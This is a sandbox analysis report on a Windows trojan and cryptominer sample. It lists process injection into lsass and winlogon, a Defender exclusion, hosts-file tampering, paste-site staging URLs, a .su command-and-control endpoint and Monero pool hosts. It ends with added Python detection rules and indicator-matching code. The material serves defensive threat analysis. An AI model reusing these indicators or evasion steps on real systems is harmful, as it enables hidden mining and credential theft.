Defense Evasion: 712 Process Injection; 131 Virtualization/Sandbox Evasion; 4 Rootkit; 1 Disable or Modify Tools; 1 File and Directory Permissions Modification; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 1 Masquerading; 1 Modify Registry; 1 Access Token Manipulation; 1 Hidden Files and Directories
Credential Access: 1 Credential API Hooking
Discovery: 131 Virtualization/Sandbox Evasion; 34 Security Software Discovery; 24 System Information Discovery; 1 System Time Discovery; 1 File and Directory Discovery; 1 Process Discovery; 1 Application Window Discovery; 1 Remote System Discovery
Collection: 1 Archive Collected Data; 1 Credential API Hooking
Command and Control: 21 Encrypted Channel; 4 Application Layer Protocol; 3 Non-Application Layer Protocol; 1 Web Service; 1 Ingress Tool Transfer
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no matched techniques

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1530444 | Sample: egFMhHSlmf.exe | Start date: 10/10/2024 | Architecture: WINDOWS | Score: 100

Analysis-wide DNS/IP: rentry.co; pastebin.com; 4 other IPs or domains
Analysis-wide signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 17 other signatures
pastebin.com: Connects to a pastebin service (likely for C&C)

Process tree ("started" = child process created; "injected" = code written into an already running process):

powershell.exe (top-level)
  signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
  started: dllhost.exe; conhost.exe
    dllhost.exe
      signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Creates a thread in another existing process (thread injection); 2 other signatures
      injected: winlogon.exe; lsass.exe; 2 other processes
        winlogon.exe
          started: dllhost.exe
            dllhost.exe
              signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
              injected: svchost.exe; svchost.exe
        lsass.exe
          signatures: Writes to foreign memory regions

egFMhHSlmf.exe (top-level)
  dropped: C:\ProgramData\Google\Chrome\updater.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
  signatures: Uses powercfg.exe to modify the power settings; Modifies the hosts file; Adds a directory exclusion to Windows Defender
  started: powershell.exe; cmd.exe; 14 other processes
    powershell.exe
      signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module
      started: conhost.exe
        conhost.exe
          signatures: Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate
    cmd.exe
      started: conhost.exe; wusa.exe
    14 other processes
      started: 13 other processes

updater.exe (top-level)
  dropped: C:\Windows\Temp\xptjtnajcbas.sys (PE32+)
  signatures: Multi AV Scanner detection for dropped file; Sample is not signed and drops a device driver; Modifies power options to not sleep / hibernate
  started: dialer.exe; powershell.exe; 12 other processes
    dialer.exe
      network: justpaste.it 83.168.108.45:443 (local port 49740, ESPOL-ASPL, Poland); rentry.co 104.26.3.16:443 (local port 49734, CLOUDFLARENETUS, United States); 3 other IPs or domains
      signatures: Query firmware table information (likely to detect VMs)
    powershell.exe
      started: conhost.exe
    12 other processes
      started: 11 other processes

powershell.exe (top-level)
  started: conhost.exe
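Added example, not part of the report or of the sample: lineage and injection rules derived from the process tree above (powershell.exe spawning dllhost.exe, dllhost.exe creating remote threads in winlogon.exe, lsass.exe and svchost.exe, an updater.exe living under C:\ProgramData, and dialer.exe opening TLS sessions to paste sites). Events are constructed Sysmon-style records (EID 1 process create, EID 3 network connect, EID 8 CreateRemoteThread); process IDs other than 1764 and 5712 are invented. The baseline assumptions, that dllhost.exe is normally parented by svchost.exe (DcomLaunch) and that Google's updater is never installed under C:\ProgramData, must be confirmed against your own environment before the rules go live.

```python
"""Lineage and remote-thread checks modelled on the behaviour graph of this sample."""
import ntpath

PROTECTED_TARGETS = {"lsass.exe", "winlogon.exe", "svchost.exe", "explorer.exe"}
# COM surrogate is normally launched by the DcomLaunch service host (assumed baseline)
EXPECTED_PARENTS = {"dllhost.exe": {"svchost.exe"}}
# legacy phone-dialer binary; no legitimate reason to open outbound TCP sessions
NO_NETWORK_EXPECTED = {"dialer.exe"}
# assumption: a binary named updater.exe under ProgramData is masquerading as Google's updater
MASQUERADE_NAMES = {"updater.exe"}
MASQUERADE_PREFIX = "c:\\programdata\\"


def _name(path):
    return ntpath.basename(path or "").lower()


def score_process_chain(events):
    """Return (rule, detail, pid) tuples in event order."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:
            img, parent = _name(ev["Image"]), _name(ev.get("ParentImage"))
            if img in EXPECTED_PARENTS and parent not in EXPECTED_PARENTS[img]:
                findings.append(("unexpected_parent", f"{parent} -> {img}", ev["ProcessId"]))
            if img in MASQUERADE_NAMES and ev["Image"].lower().startswith(MASQUERADE_PREFIX):
                findings.append(("masquerading_path", ev["Image"], ev["ProcessId"]))
        elif eid == 3:
            img = _name(ev["Image"])
            if img in NO_NETWORK_EXPECTED:
                dest = f"{ev['DestinationHostname']}:{ev['DestinationPort']}"
                findings.append(("lolbin_network", f"{img} -> {dest}", ev["ProcessId"]))
        elif eid == 8:
            src, tgt = _name(ev["SourceImage"]), _name(ev["TargetImage"])
            if tgt in PROTECTED_TARGETS:
                findings.append(("remote_thread_into_protected", f"{src} -> {tgt}",
                                 ev["SourceProcessId"]))
    return findings


def lineage(events, pid):
    """Image names from the oldest known ancestor down to pid, from EID 1 events."""
    table = {e["ProcessId"]: (_name(e["Image"]), e["ParentProcessId"], _name(e.get("ParentImage")))
             for e in events if e["EventID"] == 1}
    chain = []
    while pid in table:
        name, ppid, pname = table[pid]
        chain.append(name)
        if ppid not in table:          # parent predates the log: keep its name and stop
            chain.append(pname)
            break
        pid = ppid
    return chain[::-1]


SAMPLE_EVENTS = [  # constructed; image paths follow the report, PIDs are illustrative
    {"EventID": 1, "ProcessId": 1764, "Image": r"C:\Users\user\Desktop\egFMhHSlmf.exe",
     "ParentProcessId": 3000, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 2100, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessId": 1764, "ParentImage": r"C:\Users\user\Desktop\egFMhHSlmf.exe"},
    {"EventID": 1, "ProcessId": 2200, "Image": r"C:\Windows\System32\dllhost.exe",
     "ParentProcessId": 2100, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 8, "SourceProcessId": 2200, "SourceImage": r"C:\Windows\System32\dllhost.exe",
     "TargetProcessId": 700, "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 8, "SourceProcessId": 2200, "SourceImage": r"C:\Windows\System32\dllhost.exe",
     "TargetProcessId": 600, "TargetImage": r"C:\Windows\System32\winlogon.exe"},
    {"EventID": 1, "ProcessId": 2300, "Image": r"C:\Windows\System32\dllhost.exe",
     "ParentProcessId": 600, "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"EventID": 8, "SourceProcessId": 2300, "SourceImage": r"C:\Windows\System32\dllhost.exe",
     "TargetProcessId": 900, "TargetImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 1, "ProcessId": 5712, "Image": r"C:\ProgramData\Google\Chrome\updater.exe",
     "ParentProcessId": 800, "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "ProcessId": 2400, "Image": r"C:\Windows\System32\dialer.exe",
     "ParentProcessId": 5712, "ParentImage": r"C:\ProgramData\Google\Chrome\updater.exe"},
    {"EventID": 3, "ProcessId": 2400, "Image": r"C:\Windows\System32\dialer.exe",
     "DestinationHostname": "rentry.co", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 2500, "Image": r"C:\Windows\System32\dllhost.exe",   # benign COM surrogate
     "ParentProcessId": 900, "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for finding in score_process_chain(SAMPLE_EVENTS):
        print(finding)
    print(" -> ".join(lineage(SAMPLE_EVENTS, 2200)))
```

Injected processes never appear as children, so lineage() alone would show winlogon.exe as a legitimate root; it is the EID 8 pairing that ties the second dllhost.exe back to the first.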

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Initial sample
Source | Detection | Scanner | Label
egFMhHSlmf.exe | 74% | ReversingLabs | Win64.Trojan.Generic
egFMhHSlmf.exe | 75% | Virustotal |

Dropped files
Source | Detection | Scanner | Label
C:\ProgramData\Google\Chrome\updater.exe | 74% | ReversingLabs | Win64.Trojan.Generic
C:\ProgramData\Google\Chrome\updater.exe | 75% | Virustotal |
C:\Windows\Temp\xptjtnajcbas.sys | 5% | ReversingLabs |
C:\Windows\Temp\xptjtnajcbas.sys | 3% | Virustotal |

Unpacked PE files
No Antivirus matches

Domains
Source | Detection | Scanner
justpaste.it | 1% | Virustotal
pool-fr.supportxmr.com | 3% | Virustotal
jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | 12% | Virustotal
rentry.co | 1% | Virustotal
pastebin.com | 0% | Virustotal
pool.supportxmr.com | 7% | Virustotal

URLs
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://justpaste.it/f86v1 | 1% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
https://pastebin.com/raw/sFxN07Y7 | 1% | Virustotal |
https://rentry.co/5apf98os/raw | 1% | Virustotal |
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
justpaste.it | 83.168.108.45 | true | true | | unknown
pool-fr.supportxmr.com | 141.94.96.71 | true | false | | unknown
jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | 188.114.97.3 | true | true | | unknown
rentry.co | 104.26.3.16 | true | true | | unknown
pastebin.com | 172.67.19.24 | true | true | | unknown
pool.supportxmr.com | unknown | unknown | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/sFxN07Y7 | false | | unknown
https://jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su/api/endpoint.php | true | | unknown
https://justpaste.it/f86v1 | false | | unknown
https://rentry.co/5apf98os/raw | false | | unknown
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
https://go.microsoft.coP | powershell.exe, 0000001D.00000002.2254826196.00000217EEEFC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000001D.00000002.2244051114.00000217E6C65000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 0000001D.00000002.2211112447.00000217D7B9A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.thawte.com0 | updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.3.16 | rentry.co | United States | 13335 | CLOUDFLARENETUS | true
83.168.108.45 | justpaste.it | Poland | 31304 | ESPOL-ASPL | true
172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
188.114.97.3 | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | European Union | 13335 | CLOUDFLARENETUS | true
141.94.96.144 | unknown | Germany | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | false
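Added example, not part of the report: matching the domains, URLs and IPs from the tables above against DNS and proxy logs with a confidence tier per indicator type. pastebin.com, rentry.co and justpaste.it are shared paste services, so a bare domain hit is only medium confidence; the exact raw-paste URLs, any supportxmr.com pool name and the .su domain are high; the Cloudflare addresses (104.26.3.16, 172.67.19.24, 188.114.97.3) front many unrelated tenants and rate low. The log lines are constructed in a generic key=value style, so adapt the two regexes to your own log source, and treat 141.94.96.71 as what pool-fr.supportxmr.com resolved to at analysis time rather than a stable indicator.

```python
"""Tiered matching of this report's network indicators against DNS / proxy log lines."""
import re
from urllib.parse import urlsplit

HIGH_DOMAINS = {"supportxmr.com", "jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su"}
MEDIUM_DOMAINS = {"pastebin.com", "rentry.co", "justpaste.it"}      # shared paste services
HIGH_URLS = {
    "https://pastebin.com/raw/sFxN07Y7",
    "https://rentry.co/5apf98os/raw",
    "https://justpaste.it/f86v1",
    "https://jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su/api/endpoint.php",
}
HIGH_IPS = {"141.94.96.71"}                                         # pool-fr.supportxmr.com at analysis time
SHARED_CDN_IPS = {"104.26.3.16", "172.67.19.24", "188.114.97.3"}    # Cloudflare fronts, many tenants
DNS_RE = re.compile(r"\bquery=(\S+)")
URL_RE = re.compile(r"\s(https?://\S+)")


def _suffix_match(host, domains):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_domain(host):
    if _suffix_match(host, HIGH_DOMAINS):
        return "high"
    if _suffix_match(host, MEDIUM_DOMAINS):
        return "medium"
    return None


def classify_url(url):
    """Exact raw-paste / C2 URL is high; otherwise fall back to the host tier."""
    if url.rstrip("/") in {u.rstrip("/") for u in HIGH_URLS}:
        return "high"
    return classify_domain(urlsplit(url).hostname or "")


def classify_ip(ip):
    if ip in HIGH_IPS:
        return "high"
    if ip in SHARED_CDN_IPS:
        return "low"
    return None


def scan_lines(lines):
    """Return (confidence, indicator) for each matching line. Lines carrying a URL
    (proxy logs) are judged by URL, all others by the DNS query name."""
    hits = []
    for line in lines:
        m = URL_RE.search(line)
        if m:
            conf = classify_url(m.group(1))
        else:
            m = DNS_RE.search(line)
            conf = classify_domain(m.group(1)) if m else None
        if conf:
            hits.append((conf, m.group(1)))
    return hits


SAMPLE_LOG = [  # constructed lines; client addresses and timestamps are invented
    "2024-10-10T02:56:40Z client=10.0.0.5 query=pool-fr.supportxmr.com type=A",
    "2024-10-10T02:56:41Z client=10.0.0.5 query=pastebin.com type=A",
    "2024-10-10T02:56:42Z client=10.0.0.5 GET https://pastebin.com/raw/sFxN07Y7 200",
    "2024-10-10T02:56:43Z client=10.0.0.7 GET https://pastebin.com/ 200",
    "2024-10-10T02:56:44Z client=10.0.0.5 query=jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su type=A",
    "2024-10-10T02:56:45Z client=10.0.0.9 query=www.microsoft.com type=A",
]

if __name__ == "__main__":
    for conf, indicator in scan_lines(SAMPLE_LOG):
        print(f"{conf:6} {indicator}")
```

Suffix matching on supportxmr.com covers both pool.supportxmr.com and pool-fr.supportxmr.com plus any regional pool name the config may switch to; the exact-URL tier is what separates a real paste-based staging fetch from an employee browsing pastebin.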
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1530444
Start date and time: 2024-10-10 04:55:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 68
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 6
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: egFMhHSlmf.exe (renamed because the original name is a hash value)
Original Sample Name: 1417d38c40d85d1c4eb7fad3444ca069.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.mine.winEXE@97/17@5/5
EGA Information:
• Successful, ratio: 86.7%
HCA Information: Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
              • Excluded IPs from analysis (whitelisted): 40.126.32.140, 20.190.160.22, 40.126.32.133, 20.190.160.17, 20.190.160.20, 20.190.160.14, 40.126.32.68, 40.126.32.76
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
              • Execution Graph export aborted for target egFMhHSlmf.exe, PID 1764 because it is empty
              • Execution Graph export aborted for target updater.exe, PID 5712 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
22:55:57 | API Interceptor | 1x Sleep call for process: egFMhHSlmf.exe modified
22:55:59 | API Interceptor | 59x Sleep call for process: powershell.exe modified
22:56:38 | API Interceptor | 454331x Sleep call for process: winlogon.exe modified
22:56:39 | API Interceptor | 361241x Sleep call for process: lsass.exe modified
22:56:40 | API Interceptor | 665x Sleep call for process: svchost.exe modified
22:56:41 | API Interceptor | 437583x Sleep call for process: dwm.exe modified
22:56:48 | API Interceptor | 315x Sleep call for process: dllhost.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.26.3.16SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exeGet hashmaliciousUnknownBrowse
                4wx72yFLka.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                  quotation.jsGet hashmaliciousUnknownBrowse
                    Quote.jsGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                          SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                            CV.vbsGet hashmaliciousXmrigBrowse
                              system47.exeGet hashmaliciousXWormBrowse
                                file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                  83.168.108.45updater.exeGet hashmaliciousXmrigBrowse
                                    172.67.19.24envifa.vbsGet hashmaliciousUnknownBrowse
                                    • pastebin.com/raw/V9y5Q5vv
                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                    • pastebin.com/raw/V9y5Q5vv
                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    188.114.97.3octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • servicetelemetryserver.shop/api/index.php
                                    1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                    • www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
                                    BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                    • www.launchdreamidea.xyz/bd77/
                                    http://embittermentdc.comGet hashmaliciousUnknownBrowse
                                    • embittermentdc.com/favicon.ico
                                    scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                    • paste.ee/d/gvOd3
                                    IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                    • www.bayarcepat19.click/yuvr/
                                    Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                    • www.cc101.pro/0r21/
                                    http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                    • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                    • filetransfer.io/data-package/eZFzMENr/download
                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • filetransfer.io/data-package/MlZtCPkK/download
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
rentry.co | x2Yi9Hr77a.exe | Get hash | malicious | XWorm | Browse | 172.67.75.40
rentry.co | SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exe | Get hash | malicious | Unknown | Browse | 172.67.75.40
rentry.co | MPX283rT19.exe | Get hash | malicious | Python Stealer, CStealer | Browse | 104.26.2.16
rentry.co | f2q2w9rTqd.exe | Get hash | malicious | Python Stealer, CStealer | Browse | 104.26.2.16
rentry.co | file.exe | Get hash | malicious | XWorm | Browse | 104.26.2.16
rentry.co | yhDRFwEXdd.cmd | Get hash | malicious | Unknown | Browse | 172.67.75.40
rentry.co | 4wx72yFLka.exe | Get hash | malicious | Python Stealer, CStealer, Chaos | Browse | 104.26.3.16
rentry.co | 0U9NY2PzhK.exe | Get hash | malicious | Python Stealer, CStealer, Chaos | Browse | 172.67.75.40
rentry.co | qlk8old6p9.exe | Get hash | malicious | Python Stealer, CStealer, Chaos | Browse | 172.67.75.40
rentry.co | quotation.js | Get hash | malicious | Unknown | Browse | 104.26.3.16
pastebin.com | Quotation request YN2024-10-07pdf.vbs | Get hash | malicious | Remcos | Browse | 104.20.4.235
pastebin.com | eshkere.bat | Get hash | malicious | Xmrig | Browse | 104.20.4.235
pastebin.com | frik.exe | Get hash | malicious | Xmrig | Browse | 104.20.3.235
pastebin.com | Google Chrome.exe | Get hash | malicious | Xmrig | Browse | 172.67.19.24
pastebin.com | SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe | Get hash | malicious | Unknown | Browse | 104.20.4.235
pastebin.com | SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe | Get hash | malicious | Unknown | Browse | 172.67.19.24
pastebin.com | SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe | Get hash | malicious | Unknown | Browse | 172.67.19.24
pastebin.com | SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe | Get hash | malicious | Unknown | Browse | 172.67.19.24
pastebin.com | Quotation request YN2024-10-07pdf.vbs | Get hash | malicious | Remcos | Browse | 104.20.4.235
pastebin.com | Urgent Purchase Order (P.O.) No.477764107102024.vbs | Get hash | malicious | Remcos | Browse | 172.67.19.24
justpaste.it | Payment Advice.pdf.js | Get hash | malicious | Remcos | Browse | 178.159.12.230
justpaste.it | updater.exe | Get hash | malicious | Xmrig | Browse | 83.168.108.45
justpaste.it | msdx - Linkvertise Downloader_WRu-MP1.exe | Get hash | malicious | Unknown | Browse | 51.83.143.177
justpaste.it | skybl - Linkvertise Downloader_H-oDPb1.exe | Get hash | malicious | Unknown | Browse | 51.83.143.177
justpaste.it | mdx - Linkvertise Downloader_Ou-Vm51.exe | Get hash | malicious | Unknown | Browse | 51.83.143.177
justpaste.it | y99ZI1Kjg8.exe | Get hash | malicious | Unknown | Browse | 51.83.143.177
justpaste.it | QP6s4u5SZ8.exe | Get hash | malicious | Unknown | Browse | 51.83.143.177
pool-fr.supportxmr.com | xmr_linux_amd64 (2).elf | Get hash | malicious | Xmrig | Browse | 141.94.96.195
pool-fr.supportxmr.com | xmr_linux_amd64.elf | Get hash | malicious | Xmrig | Browse | 141.94.96.195
pool-fr.supportxmr.com | SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.144
pool-fr.supportxmr.com | Q3pEXxmWAD.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.195
pool-fr.supportxmr.com | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar, Xmrig | Browse | 141.94.96.71
pool-fr.supportxmr.com | kWYLtJ0Cn1.exe | Get hash | malicious | LoaderBot, Xmrig | Browse | 141.94.96.195
pool-fr.supportxmr.com | updater.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.71
pool-fr.supportxmr.com | xjSglbp263.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.71
pool-fr.supportxmr.com | gwRQinPOHB.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.195
pool-fr.supportxmr.com | FieroHack.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.195
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | https://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#m | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | http://www.cottesloecounselling.com.au/anna-amhrose.html | Get hash | malicious | Unknown | Browse | 104.21.23.227
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 172.67.206.204
CLOUDFLARENETUS | octux.exe.exe | Get hash | malicious | Unknown | Browse | 188.114.97.3
CLOUDFLARENETUS | octux.exe.exe | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | https://link.edgepilot.com/s/a60b2ad0/3dLZ9fawZkK45-vRV49QDQ?u=https://accounts.timesoftint.com/ | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 172.67.206.204
CLOUDFLARENETUS | https://qrco.de/bfSzSw | Get hash | malicious | Unknown | Browse | 188.114.97.3
CLOUDFLARENETUS | https://urlr.me/mqbyf | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | 1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
ESPOL-ASPL | firmware.x86_64.elf | Get hash | malicious | Unknown | Browse | 83.168.127.215
ESPOL-ASPL | WizDKOmtwf.elf | Get hash | malicious | Mirai | Browse | 83.168.87.155
ESPOL-ASPL | updater.exe | Get hash | malicious | Xmrig | Browse | 83.168.108.45
ESPOL-ASPL | SecuriteInfo.com.FileRepMalware.26928.28691.exe | Get hash | malicious | Unknown | Browse | 83.168.106.22
ESPOL-ASPL | x86.elf | Get hash | malicious | Mirai | Browse | 83.168.127.232
